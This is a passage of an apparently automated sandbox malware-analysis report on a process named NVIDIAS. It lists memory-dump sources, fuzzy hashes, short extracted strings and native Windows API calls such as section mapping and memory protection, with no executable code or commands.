                                                                        • Opcode Fuzzy Hash: 188d32cf5f8c9cc15b4b9d727fbb275104b365f47fc702cfe29ec148e0f7759f
                                                                        • Instruction Fuzzy Hash: 1122C436B002159FCB14DF69D8A09AEB7F6FB88350759816AD80AEB351DB35DC46CBC0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6Q-j
                                                                        • API String ID: 0-339209807
                                                                        • Opcode ID: 7070dc8de683e569a2952889550ca1a9b4383d7d90dbed349d8026d1afe08807
                                                                        • Instruction ID: db3a2525e275fe290d1eb67a88f7fecac073adc0501c62eb92b9b41217f4bad0
                                                                        • Opcode Fuzzy Hash: 7070dc8de683e569a2952889550ca1a9b4383d7d90dbed349d8026d1afe08807
                                                                        • Instruction Fuzzy Hash: 7C226E76E112288FCB14CF68C995699BBF2BF88210F1985AADC09FB355DB349D45CF80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: l87t
                                                                        • API String ID: 0-3181590174
                                                                        • Opcode ID: e78a708725e616dd6af6af70b2a73315c247e4ea06ad08f7f578406a922a4f22
                                                                        • Instruction ID: 00ec17010533e8c84e2ea28f74c4caf7eda8217d89348a4871a0b8b912d9850d
                                                                        • Opcode Fuzzy Hash: e78a708725e616dd6af6af70b2a73315c247e4ea06ad08f7f578406a922a4f22
                                                                        • Instruction Fuzzy Hash: 2002B336F101269FC718DF68C89496AB7E7BB84250716856ADC0AEB351EB35EC46CFC0
                                                                        APIs
                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03533F69
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2706961497-0
                                                                        • Opcode ID: fc8eaf0e27ca7c62e175cc12ab82373bdc0f34175cd7e019806580e979f13dd7
                                                                        • Instruction ID: 400829ed0935ad2fcc1a8bd27d8dba2fda6819e08e6bb85ec3265c43706fc667
                                                                        • Opcode Fuzzy Hash: fc8eaf0e27ca7c62e175cc12ab82373bdc0f34175cd7e019806580e979f13dd7
                                                                        • Instruction Fuzzy Hash: EF3152B5D053899FCB11CFAAD8807DEFFF0BF49210F14886AE418A7261C3789905CBA1
                                                                        APIs
                                                                        • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 0353461E
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: SectionView
                                                                        • String ID:
                                                                        • API String ID: 1323581903-0
                                                                        • Opcode ID: 8321aa89e0cbf8e0d9c74edc8acb4c27de0f085791e42a9c4f1282252762cd0e
                                                                        • Instruction ID: db585d3c38f9e0672371c0a4f1deb3cd28b8f16ba5291740333aa648a6c4a888
                                                                        • Opcode Fuzzy Hash: 8321aa89e0cbf8e0d9c74edc8acb4c27de0f085791e42a9c4f1282252762cd0e
                                                                        • Instruction Fuzzy Hash: 3E31E4B5D01249AFDF10DFAAD884ADEBBF5FF4C224F14841AE918A3220C7359950CFA5
                                                                        APIs
                                                                        • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 0353461E
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: SectionView
                                                                        • String ID:
                                                                        • API String ID: 1323581903-0
                                                                        • Opcode ID: abb65b086e938fa9f3d454d749e09f78b597f70b4e6c1bd883610df14e52aac7
                                                                        • Instruction ID: 69271c1dd6481c75551ba3b06ad11f60dcc29615ff067b0be410587d409372d1
                                                                        • Opcode Fuzzy Hash: abb65b086e938fa9f3d454d749e09f78b597f70b4e6c1bd883610df14e52aac7
                                                                        • Instruction Fuzzy Hash: E931E0B5D00249AFDF10DFAAD884ADEBBF5FF4C224F14841AE918A3220C7359950CFA4
                                                                        APIs
                                                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03534464
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: CreateSection
                                                                        • String ID:
                                                                        • API String ID: 2449625523-0
                                                                        • Opcode ID: 362bb7089041fde28abede44ee10a6ef132a40b4fed727e7e1e67af1cc0c5da3
                                                                        • Instruction ID: 940a7be31ee71c8ef13c301b4910c8ac3d3ce4eca34ba5b27ac86f2eea9e871f
                                                                        • Opcode Fuzzy Hash: 362bb7089041fde28abede44ee10a6ef132a40b4fed727e7e1e67af1cc0c5da3
                                                                        • Instruction Fuzzy Hash: 0F2124B1D01249AFDB10DFAAD980ADEFBB4FF08310F24852AE518A3210D3759955CFA1
                                                                        APIs
                                                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03534464
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: CreateSection
                                                                        • String ID:
                                                                        • API String ID: 2449625523-0
                                                                        • Opcode ID: 2716ffb918b0d4ee97c8e044ba2d174702b2a0b929074f5007fdd205d381a870
                                                                        • Instruction ID: 0db42fab9dd7168d55ab42ed00504d4e100cf97ea7827efd52b115ff7e02168d
                                                                        • Opcode Fuzzy Hash: 2716ffb918b0d4ee97c8e044ba2d174702b2a0b929074f5007fdd205d381a870
                                                                        • Instruction Fuzzy Hash: AF2103B1D0124DAFDB00DFAAD880ADEFBB5FF48310F10842AE918A3210C7759954CFA1
                                                                        APIs
                                                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03534389
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: FileOpen
                                                                        • String ID:
                                                                        • API String ID: 2669468079-0
                                                                        • Opcode ID: 8e5e690fb4d4f1baa87e84c798186e3d85572f3fa39f8b785a895fa30f8eb057
                                                                        • Instruction ID: 09753a97442b9bc51524e83bc54634815383c4be205a8d51f7545d43321afac6
                                                                        • Opcode Fuzzy Hash: 8e5e690fb4d4f1baa87e84c798186e3d85572f3fa39f8b785a895fa30f8eb057
                                                                        • Instruction Fuzzy Hash: F32103B1D01249AFDB00DFAAD984BDEFBB5FF48210F50852AE918B7210C7759954CBA1
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0353403B
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 67fb803b73f26ce7467094a8c0ef4f257d3d36b8de7107a36b564d1cc07001db
                                                                        • Instruction ID: 697478a224e9594b2964be593c0edf3864a31b7c859921b751216251d6274b11
                                                                        • Opcode Fuzzy Hash: 67fb803b73f26ce7467094a8c0ef4f257d3d36b8de7107a36b564d1cc07001db
                                                                        • Instruction Fuzzy Hash: 7E2134B1E002499FDB10DFAAD884ADEFBF5FF88310F10842AE518A7250C7359555CBA1
                                                                        APIs
                                                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03534389
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: FileOpen
                                                                        • String ID:
                                                                        • API String ID: 2669468079-0
                                                                        • Opcode ID: e4f03152a93a60b2055d0c19f6fea99962cec878b958cd3d21fef701b29576a4
                                                                        • Instruction ID: 713afd5abb4b14ee8a2df740617ce34d769d7195a2f30beceb9438a89419a9b3
                                                                        • Opcode Fuzzy Hash: e4f03152a93a60b2055d0c19f6fea99962cec878b958cd3d21fef701b29576a4
                                                                        • Instruction Fuzzy Hash: 532114B1D0124DAFDB00DFAAD884ADEFBF4FF48310F50842AE518A3210C7759954CBA1
                                                                        APIs
                                                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 035347BE
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: ControlDeviceFile
                                                                        • String ID:
                                                                        • API String ID: 3512290074-0
                                                                        • Opcode ID: f8e6f23ae89cb83e19c15ab3edfdf32260053418a90cb83a7a508c687072a750
                                                                        • Instruction ID: 585b91878907408e0946f3c141a255e8df1c0add6e689649aec45d782d90d912
                                                                        • Opcode Fuzzy Hash: f8e6f23ae89cb83e19c15ab3edfdf32260053418a90cb83a7a508c687072a750
                                                                        • Instruction Fuzzy Hash: 7F2136B19002499FDF10DFAAD884ADEFBF1FF48314F14841AE918A3210C7399955CFA1
                                                                        APIs
                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03533F69
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2706961497-0
                                                                        • Opcode ID: a573c62dc28bc9c28edeada7690f01fc33c24387b4edc5d29485570d3984eccb
                                                                        • Instruction ID: 117fe0aa3e85e73f4e09f9439b510073d6a6f873c0d281f797d3413de047d309
                                                                        • Opcode Fuzzy Hash: a573c62dc28bc9c28edeada7690f01fc33c24387b4edc5d29485570d3984eccb
                                                                        • Instruction Fuzzy Hash: 5A2103B1D013499FDB10DFAAD880ADEFBF5FF48310F60842AE419A3250C775A900CBA1
                                                                        APIs
                                                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 035347BE
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: ControlDeviceFile
                                                                        • String ID:
                                                                        • API String ID: 3512290074-0
                                                                        • Opcode ID: d01f5f00d38a9e8cbb6089806060e7da4e38460a1bf8d8690d7571e30c1a3636
                                                                        • Instruction ID: 318c8e9389d115a9a195619c44beace0a269e1598f46db3002cf8b3fa2ad69d0
                                                                        • Opcode Fuzzy Hash: d01f5f00d38a9e8cbb6089806060e7da4e38460a1bf8d8690d7571e30c1a3636
                                                                        • Instruction Fuzzy Hash: FE2137B19002499FDF10DFAAD884ADEFBF5FF48314F148419E919A3210C7759955CFA1
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0353403B
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 6c9d51be4c5c91a5ea4b9f4273e889639ca1e89f01c8e43dc6718f16013c17c9
                                                                        • Instruction ID: 3092f60a32819c189b779f2295a714f88755cba9b94b03fda88ac719f6117d71
                                                                        • Opcode Fuzzy Hash: 6c9d51be4c5c91a5ea4b9f4273e889639ca1e89f01c8e43dc6718f16013c17c9
                                                                        • Instruction Fuzzy Hash: 192120B1D003499FDB10DFAAD884ADEFBF5FF48210F50882AE919A7250C775A954CBA1
                                                                        APIs
                                                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 035346E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: FileInformationQueryVolume
                                                                        • String ID:
                                                                        • API String ID: 634242254-0
                                                                        • Opcode ID: 2155d713459a17cd05312f8d9e41146181dbe26a4db15afc71a4fd3cb68c2b9f
                                                                        • Instruction ID: 02d6601bcac7f7491cdfe3056c24d4115121a7d9820b36ec527bdf287f523fd7
                                                                        • Opcode Fuzzy Hash: 2155d713459a17cd05312f8d9e41146181dbe26a4db15afc71a4fd3cb68c2b9f
                                                                        • Instruction Fuzzy Hash: 022113B1D002499FDB10DFAAD884BEEFBF5BF88310F14881AD459A7250C778A944CFA1
                                                                        APIs
                                                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 035346E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: FileInformationQueryVolume
                                                                        • String ID:
                                                                        • API String ID: 634242254-0
                                                                        • Opcode ID: e73336d6348e3dc08a1c084eca8aa158baf2e24c2e9ef8ebebe224dddb069e69
                                                                        • Instruction ID: b47f3793bec6518d409f893ca56a0ee993aeed852a8c59d42c85e83e1067bfa0
                                                                        • Opcode Fuzzy Hash: e73336d6348e3dc08a1c084eca8aa158baf2e24c2e9ef8ebebe224dddb069e69
                                                                        • Instruction Fuzzy Hash: E621F4B1D003499FDB10DFAAD884BEEFBF5BF48214F14882AD519A7250C775A944CFA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4c
                                                                        • API String ID: 0-1137683036
                                                                        • Opcode ID: 7acf21d3708f9d989b12c1e97e301a39d1093e2be1bd5d4fe5af600cc3bc75e8
                                                                        • Instruction ID: 9e94fbdfdf43c3b955ecf868447611ddc161f4bf12d916773de19cd41461ceea
                                                                        • Opcode Fuzzy Hash: 7acf21d3708f9d989b12c1e97e301a39d1093e2be1bd5d4fe5af600cc3bc75e8
                                                                        • Instruction Fuzzy Hash: 04B10F71B003058FC718CFADD8E5699BBB2BFD8210B55816AE409DB786EB70AC56CF40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 231e37b1a35d42b0f88399f0b09ebe383645b60540df701a16acd4a36525876e
                                                                        • Instruction ID: 197ba6b09bc4e0384825a69f3abb8e0f19633b521f9f8450e1822028ebbaf292
                                                                        • Opcode Fuzzy Hash: 231e37b1a35d42b0f88399f0b09ebe383645b60540df701a16acd4a36525876e
                                                                        • Instruction Fuzzy Hash: B71158B5D003498FDB10DFAAD8447EEFBF5AF88224F24881AC419A7650C738A544CFA4
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: f57e7c043d8658a0f445277d686d3bb98ab3b52eda75b1fba9b4058c35970d21
                                                                        • Instruction ID: c1f015d01a548dd0ce9742f93fbc5c92db83cefdc9a4c74974c29b7c468ffa2c
                                                                        • Opcode Fuzzy Hash: f57e7c043d8658a0f445277d686d3bb98ab3b52eda75b1fba9b4058c35970d21
                                                                        • Instruction Fuzzy Hash: 1C1136B1D003498FDB10DFAAD8447EEFBF5AB88224F24881AC419A7250C779A944CFA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \Vil
                                                                        • API String ID: 0-949338265
                                                                        • Opcode ID: b346928a716c4d688ee9f313c72139ab0f8cbd0ca79ad7cb6d9b4aa10376dcae
                                                                        • Instruction ID: d98c31fdd0c2cbf79860b871d650454465972314343a2702ec729c5825bc5326
                                                                        • Opcode Fuzzy Hash: b346928a716c4d688ee9f313c72139ab0f8cbd0ca79ad7cb6d9b4aa10376dcae
                                                                        • Instruction Fuzzy Hash: 34B16E74E00249DFDB14CFA9D8957AEBBF2BF88304F14812AE819A7254EB749845CF81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-76226702
                                                                        • Opcode ID: 2866f57966b781b0262e30b028fa1210d32529459e340b42d7b7dd380af95d9f
                                                                        • Instruction ID: fa3f74c04385a5fc3e8035d3dadf5cfbfb99b57cbcb7bac527ff6187263416e8
                                                                        • Opcode Fuzzy Hash: 2866f57966b781b0262e30b028fa1210d32529459e340b42d7b7dd380af95d9f
                                                                        • Instruction Fuzzy Hash: 2C91DEB2F102169BDB09DAADD9A15ADB7E6FBC82507058179E80CEB340EB34DD05CBC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \Vil
                                                                        • API String ID: 0-949338265
                                                                        • Opcode ID: d5a005b7cd5fc6dc86940dc513fdfbe3cd45fca12f60ef68bbd5759c91bf9ef6
                                                                        • Instruction ID: 2f2ec23a189445adc7b6edf04a7ac76f8af26cfe8e46c0c7ce4b03cf0f774d61
                                                                        • Opcode Fuzzy Hash: d5a005b7cd5fc6dc86940dc513fdfbe3cd45fca12f60ef68bbd5759c91bf9ef6
                                                                        • Instruction Fuzzy Hash: 48914974E04209DFDF14CFA9D8857AEBBF2BF88314F14812AE405AB294EB749845CF95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D!)
                                                                        • API String ID: 0-952686769
                                                                        • Opcode ID: db3227e9383d51b28e5f4277fca49ed9ad5cd620352ad166a8e8d77b2a51e818
                                                                        • Instruction ID: 47c4159ea64341e7a31a073201be58ec0337b42fe3f16afd22c9c4333d496049
                                                                        • Opcode Fuzzy Hash: db3227e9383d51b28e5f4277fca49ed9ad5cd620352ad166a8e8d77b2a51e818
                                                                        • Instruction Fuzzy Hash: 6171C477F116294F8B14CEADDC9059DF7F2BB8826470A456AE846FB350DA30DC06CB80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2f9P
                                                                        • API String ID: 0-1389593834
                                                                        • Opcode ID: d5e59eb83f55ec30a9754b4c5f3083222771d90b07e4fc85d864e46eb6b38851
                                                                        • Instruction ID: 481a293f8407d7736716ac3e1c71f09e85e312efad4badb2acfb5d3316f8a806
                                                                        • Opcode Fuzzy Hash: d5e59eb83f55ec30a9754b4c5f3083222771d90b07e4fc85d864e46eb6b38851
                                                                        • Instruction Fuzzy Hash: 02814E36B101159FC718DEADD4A09AAB7E6BBC8310719C65AD809EB391DA35EC46CFC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48c30f9de69f32d4db8f6d95b526b3511008683e7f96a92353a939254112d9fe
                                                                        • Instruction ID: b19c6f8f5fe96e255d5cfbcab1fac1381775f6c768adc63559d4529aec690ffa
                                                                        • Opcode Fuzzy Hash: 48c30f9de69f32d4db8f6d95b526b3511008683e7f96a92353a939254112d9fe
                                                                        • Instruction Fuzzy Hash: 7BB27272E105398BCB64CF6CC894699F7B2BB88310F5686A9D809FB354DB749D81CF84
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61e359f5e7002dc30fd6cc599642ddc9e4e4b43f25c42913b32d140cf53691b0
                                                                        • Instruction ID: 263842c8836e2b8aa8b9eaf757a29e7d6cc89b0dd2afdc945e6873c0b7092fa2
                                                                        • Opcode Fuzzy Hash: 61e359f5e7002dc30fd6cc599642ddc9e4e4b43f25c42913b32d140cf53691b0
                                                                        • Instruction Fuzzy Hash: F6512536F002148FD709DF69C89056ABBB2FBC526070AC56AD849EB391DB359C07CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f53a6de0836306fb82dcb29514d878233629679716ee6ffed574307d65141cec
                                                                        • Instruction ID: e066627bd84f81ffde68e46674cb5e97a80028386001f793a0c1cfb637c298b2
                                                                        • Opcode Fuzzy Hash: f53a6de0836306fb82dcb29514d878233629679716ee6ffed574307d65141cec
                                                                        • Instruction Fuzzy Hash: A1620676F106258BDB18DF6CC894599B7E2BFC821071A852ADC05EB794DB34EC56CBC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a9907bb428787eaadec2602cd73e85ec11cf2d8a72ca50f16da0bc7d2c976521
                                                                        • Instruction ID: d6210313327605ace1998c83bb7b451da04bb54394a17fcb6a3f63dd22517ef4
                                                                        • Opcode Fuzzy Hash: a9907bb428787eaadec2602cd73e85ec11cf2d8a72ca50f16da0bc7d2c976521
                                                                        • Instruction Fuzzy Hash: 1752D536B002248FD715DF6CD89499ABBF6FBC931071A85AAD849EB351DB30DC46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b8558996ab8a2c7e9a9dd9f843757339108275d51cb7ed9d408a3d79e65d9179
                                                                        • Instruction ID: aa7e93f30208ef79695142f270c51abeead1ade78921034fe38c9f5130def0f8
                                                                        • Opcode Fuzzy Hash: b8558996ab8a2c7e9a9dd9f843757339108275d51cb7ed9d408a3d79e65d9179
                                                                        • Instruction Fuzzy Hash: 9A429176F102298FCB18DFA8C8A459DB7B6BFC4310B15856AD809EB395DB359C46CF80
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2aff0078f9cbcb98eff2c37c7d5bfbf96fa09b32948faf40884ac53f9fe53686
                                                                        • Instruction ID: 346165d1c6ff7c4ce905a832498a0d2b6620486e995a7cb8d3e7f05944ae030a
                                                                        • Opcode Fuzzy Hash: 2aff0078f9cbcb98eff2c37c7d5bfbf96fa09b32948faf40884ac53f9fe53686
                                                                        • Instruction Fuzzy Hash: B342C636B052648FD715DFA8C890AAAB7F3BF8431071984AED849DB356DB35DC46CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23cccc463c6089f95e2fb81d4af4f77678afb7d55ace16c2ce63aabbd1320558
                                                                        • Instruction ID: 53c6029dbbc2683acc710e6873c49422c0a5fe9596f56aad122623e486221f0e
                                                                        • Opcode Fuzzy Hash: 23cccc463c6089f95e2fb81d4af4f77678afb7d55ace16c2ce63aabbd1320558
                                                                        • Instruction Fuzzy Hash: D072D674E00209DFCB58DFA4D5946ADBBB2FF99224F6080A9D40AAB354DF319E85CF11
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1bd2b091fa7ea67a95bdfc5bd897a44c14077349a145ac26461e605b9fc5ea
